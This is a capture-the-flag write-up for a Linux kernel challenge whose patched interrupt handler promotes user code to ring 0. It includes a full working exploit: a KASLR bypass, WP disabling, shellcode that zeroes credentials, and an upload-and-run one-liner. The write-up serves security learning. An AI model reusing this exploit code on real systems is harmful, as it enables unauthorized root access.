Promotion - PWN
Points: 477 | Solves: 24 | Flag: BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...} | Solved by: Smothy @ 0xN1umb

what we got
Kernel pwn challenge. Files:
bzImage- compressed Linux kernel (6.17.0-dirty)rootfs.cpio.gz- minimal rootfs (busybox, drops to uid 1000)run.sh- QEMU launcher withkaslr pti=on,-cpu kvm64, flag at-hda /challenge/flag.txtdiff.txt- the juicy kernel patch
understanding the vuln
The patch adds a custom interrupt handler at vector 0x81, registered as SYSG (System Gate = user-callable from ring 3):
SYM_CODE_START(asm_exc_promotion)
pushq %rax
movq %cs, %rax ; grab kernel CS (0x10)
movq %rax, 16(%rsp) ; overwrite CS in iretq frame
xorq %rax, %rax
movq %rax, 40(%rsp) ; zero SS in iretq frame
popq %rax
iretq
SYM_CODE_END(asm_exc_promotion)ngl this is clean af. when you int $0x81 from userland, the CPU pushes the usual interrupt frame (SS, RSP, RFLAGS, CS, RIP) onto the kernel stack. the handler then overwrites CS with kernel CS and zeros SS. so when iretq fires, you land back at your next user instruction but now running at CPL 0 (ring 0). literally a "promotion" lmao.
QEMU uses -cpu kvm64 which means no SMEP, no SMAP. we can access user memory from ring 0 freely. but PTI (KPTI) is on, which matters later.
the solve
step 1: getting to ring 0
easy part. just int $0x81 and we're supervisor. but there's housekeeping:
cli- disable interrupts so nothing disturbs usswapgs- switch GS to kernel GS base (needed for percpu access later)- switch RSP to our own mmap'd stack (the user stack might be too shallow for ring 0 push operations)
step 2: KASLR bypass
kptr_restrict=1 and dmesg_restrict=1 so no leaking from userspace. but from ring 0 we can use sidt to read the IDT base (in the CPU entry area), then parse the IDT gate descriptor for vector 0x81 to recover the actual address of asm_exc_promotion. comparing against the static address gives us the KASLR slide.
sidt (%rsp) ; store IDT base
movq 2(%rsp), %rax ; IDT base addr
addq $0x810, %rax ; IDT entry for vector 0x81 (16 bytes each)
; reconstruct 64-bit handler address from gate descriptor fields
movzwl (%rax), %ebx ; offset[15:0]
movzwl 6(%rax), %ecx ; offset[31:16]
shll $16, %ecx
orl %ecx, %ebx
movl 8(%rax), %ecx ; offset[63:32]
shlq $32, %rcx
orq %rcx, %rbx ; rbx = asm_exc_promotion + KASLRstep 3: the NX wall (the hard part)
first attempt was to just switch CR3 to kernel page tables and do everything inline. nope. with KPTI, the kernel page tables set the NX bit on all user PGD entries. so the moment you switch CR3 to kernel page tables, your own code becomes non-executable. instant fault.
the key insight: the .entry.text section is mapped and executable in BOTH user and kernel page tables (it has to be, for interrupt entry/exit). and asm_exc_promotion lives in this section. so we can:
- clear CR0.WP (write protect)
- copy our shellcode over
asm_exc_promotionin entry text - jump there - it executes fine from both page table sets
step 4: the credential shellcode
the shellcode (40 bytes) copied to entry text does:
mov %r15, %cr3 ; switch to kernel page tables
mov %gs:(%rdx), %rax ; read current_task from percpu
mov 0x768(%rax), %rax ; current->cred (offset found via objdump)
xor %rcx, %rcx
mov %rcx, 0x8(%rax) ; uid = gid = 0
mov %rcx, 0x10(%rax) ; suid = sgid = 0
mov %rcx, 0x18(%rax) ; euid = egid = 0
mov %rcx, 0x20(%rax) ; fsuid = fsgid = 0
mov %r14, %cr3 ; switch back to user page tables
jmp *%rbx ; returnthe offsets were extracted from the vmlinux (recovered symbols via vmlinux-to-elf):
current_taskpercpu variable at0xffffffff83729018(found by disassemblingsys_getuid)credattask_struct + 0x768uidatcred + 0x8,euidatcred + 0x18, etc.
step 5: clean return to userland
after the shellcode returns, restore CR0, swapgs back, build an iretq frame and return to ring 3:
swapgs
pushq user_ss
pushq (saved_rsp - 8) ; alignment fix!!
pushq user_rflags
pushq user_cs
pushq ret_rip ; -> get_root_shell()
iretqcritical bug i hit: the -8 on saved_rsp. x86-64 ABI expects RSP = 16n+8 at function entry (as if call pushed a return address). without this fix, SSE instructions inside libc (movaps etc) would SIGSEGV on the misaligned stack. lost like an hour to this lol.
step 6: read the flag
back in userland as uid=0(root), just open("/dev/sda") and read the flag. the challenge mounts the flag file as a raw disk via -hda.
making it uploadable
the final exploit is compiled with -nostdlib -static using raw syscalls only - 9KB binary, gzips+base64 to ~800 bytes. uploads to the remote shell in a single echo command:
echo '<base64>' | base64 -d | gzip -d > /tmp/e && chmod +x /tmp/e && /tmp/efull exploit
// Minimal exploit using raw syscalls - no libc needed
// Compile: gcc -static -nostdlib -no-pie -Os -o exploit exploit_tiny.c && strip exploit
#include <stdint.h>
#define SYS_READ 0
#define SYS_WRITE 1
#define SYS_OPEN 2
#define SYS_CLOSE 3
#define SYS_MMAP 9
#define SYS_EXIT 60
#define PROT_READ 1
#define PROT_WRITE 2
#define MAP_PRIVATE 0x02
#define MAP_ANONYMOUS 0x20
#define MAP_POPULATE 0x08000
#define O_RDONLY 0
static long syscall1(long nr, long a1) {
long ret;
asm volatile("syscall" : "=a"(ret) : "a"(nr), "D"(a1) : "rcx", "r11", "memory");
return ret;
}
static long syscall2(long nr, long a1, long a2) {
long ret;
asm volatile("syscall" : "=a"(ret) : "a"(nr), "D"(a1), "S"(a2) : "rcx", "r11", "memory");
return ret;
}
static long syscall3(long nr, long a1, long a2, long a3) {
long ret;
asm volatile("syscall" : "=a"(ret) : "a"(nr), "D"(a1), "S"(a2), "d"(a3) : "rcx", "r11", "memory");
return ret;
}
static long syscall6(long nr, long a1, long a2, long a3, long a4, long a5, long a6) {
long ret;
register long r10 asm("r10") = a4;
register long r8 asm("r8") = a5;
register long r9 asm("r9") = a6;
asm volatile("syscall" : "=a"(ret) : "a"(nr), "D"(a1), "S"(a2), "d"(a3),
"r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
static void my_write(int fd, const char *s, int len) { syscall3(SYS_WRITE, fd, (long)s, len); }
static void my_puts(const char *s) {
const char *p = s; while (*p) p++;
my_write(1, s, (int)(p - s));
}
unsigned long user_cs, user_ss, user_rflags, saved_rsp, ret_rip, r0_stk;
// Shellcode: switch CR3->kernel, zero creds, switch CR3->user, return
unsigned char shellcode[] = {
0x41, 0x0f, 0x22, 0xdf, // mov %r15, %cr3
0x65, 0x48, 0x8b, 0x02, // mov %gs:(%rdx), %rax (current_task)
0x48, 0x8b, 0x80, 0x68, 0x07, 0x00, 0x00, // mov 0x768(%rax), %rax (->cred)
0x48, 0x31, 0xc9, // xor %rcx, %rcx
0x48, 0x89, 0x48, 0x08, // zero uid+gid
0x48, 0x89, 0x48, 0x10, // zero suid+sgid
0x48, 0x89, 0x48, 0x18, // zero euid+egid
0x48, 0x89, 0x48, 0x20, // zero fsuid+fsgid
0x41, 0x0f, 0x22, 0xde, // mov %r14, %cr3
0xff, 0xe3 // jmp *%rbx
};
void get_root_shell() {
my_puts("[+] Root!\n");
char buf[512];
int fd = syscall2(SYS_OPEN, (long)"/dev/sda", O_RDONLY);
if (fd >= 0) {
long n = syscall3(SYS_READ, fd, (long)buf, 512);
if (n > 0) {
int i; for (i = 0; i < n && buf[i] && buf[i] != '\n'; i++);
if (i < n && buf[i] == '\n') i++;
my_write(1, buf, i);
}
syscall1(SYS_CLOSE, fd);
}
my_puts("\n");
syscall1(SYS_EXIT, 0);
}
void _start() {
asm volatile("mov %%cs,%0\nmov %%ss,%1\npushfq\npopq %2"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags));
long stk = syscall6(SYS_MMAP, 0, 0x40000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
r0_stk = stk + 0x40000 - 0x100;
ret_rip = (unsigned long)get_root_shell;
my_puts("[*] Exploiting...\n");
asm volatile("mov %%rsp, %0" : "=m"(saved_rsp));
asm volatile(
// promote to ring 0
"int $0x81\n" "cli\n" "swapgs\n"
"movq r0_stk(%%rip), %%rsp\n"
// KASLR from IDT entry 0x81
"sub $16,%%rsp\n" "sidt (%%rsp)\n" "movq 2(%%rsp),%%rax\n" "add $16,%%rsp\n"
"addq $0x810,%%rax\n"
"movzwl (%%rax),%%ebx\n" "movzwl 6(%%rax),%%ecx\n"
"shll $16,%%ecx\n" "orl %%ecx,%%ebx\n"
"movl 8(%%rax),%%ecx\n" "shlq $32,%%rcx\n" "orq %%rcx,%%rbx\n"
"movq %%rbx,%%r12\n" // r12 = shellcode dest (entry text)
"movabs $0xffffffff81001d30,%%rax\n" "subq %%rax,%%rbx\n" // KASLR offset
"movabs $0xffffffff83729018,%%rdx\n" "addq %%rbx,%%rdx\n" // current_task percpu
// CR3 setup (user vs kernel page tables)
"mov %%cr3,%%r14\n" "movq %%r14,%%r15\n"
"btrq $12,%%r15\n" "btrq $11,%%r15\n" // r15 = kernel CR3
// disable WP, copy shellcode to entry text
"mov %%cr0,%%rax\n" "movq %%rax,%%r9\n" "btrq $16,%%rax\n" "mov %%rax,%%cr0\n"
"leaq shellcode(%%rip),%%rsi\n" "movq %%r12,%%rdi\n"
"movq (%%rsi),%%rax\n" "movq %%rax,(%%rdi)\n"
"movq 8(%%rsi),%%rax\n" "movq %%rax,8(%%rdi)\n"
"movq 16(%%rsi),%%rax\n" "movq %%rax,16(%%rdi)\n"
"movq 24(%%rsi),%%rax\n" "movq %%rax,24(%%rdi)\n"
"movq 32(%%rsi),%%rax\n" "movq %%rax,32(%%rdi)\n"
// jump to shellcode in entry text
"leaq 1f(%%rip),%%rbx\n" "jmp *%%r12\n"
// back from shellcode - restore and return to userland
"1:\n"
"movq %%r9,%%rax\n" "mov %%rax,%%cr0\n" // restore WP
"swapgs\n"
"movq user_ss(%%rip),%%rax\n" "pushq %%rax\n"
"movq saved_rsp(%%rip),%%rax\n" "subq $8,%%rax\n" "pushq %%rax\n"
"movq user_rflags(%%rip),%%rax\n" "pushq %%rax\n"
"movq user_cs(%%rip),%%rax\n" "pushq %%rax\n"
"movq ret_rip(%%rip),%%rax\n" "pushq %%rax\n"
"iretq\n"
::: "rax","rbx","rcx","rdx","rsi","rdi","r8","r9","r12","r14","r15","memory","cc"
);
}gotchas & failed attempts
-
SIDT from userland gives wrong address - SIDT returns the CPU entry area IDT address, not
idt_table. moved KASLR computation to ring 0 where we can read the gate descriptors directly. -
double fault on push - pushing the iretq frame below the user stack mapping caused a page fault in ring 0 with no kernel stack. fixed by using a pre-mapped mmap'd stack.
-
double fault on SWAPGS miss - without
swapgs, any exception handler tried to access percpu data via the wrong GS base. cascade of faults -> double fault. -
NX on user pages from kernel page tables - KPTI sets NX on user PGD entries in the kernel page tables. can't execute user code after switching CR3. solved by copying shellcode to
.entry.text(the one region mapped+executable in both page tables). -
stack alignment SIGSEGV - iretq to a function needs RSP = 16n+8 (like after a
call). without the-8adjustment,movapsin libc internals crashed. dumbest hour of my life. -
modprobe_path didn't work - first tried the classic modprobe_path overwrite. the write succeeded but the helper never executed. switched to direct cred zeroing which is more reliable anyway.
flag
BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...}
promotions ARE great. if i only had a job fr fr
smothy out ✌️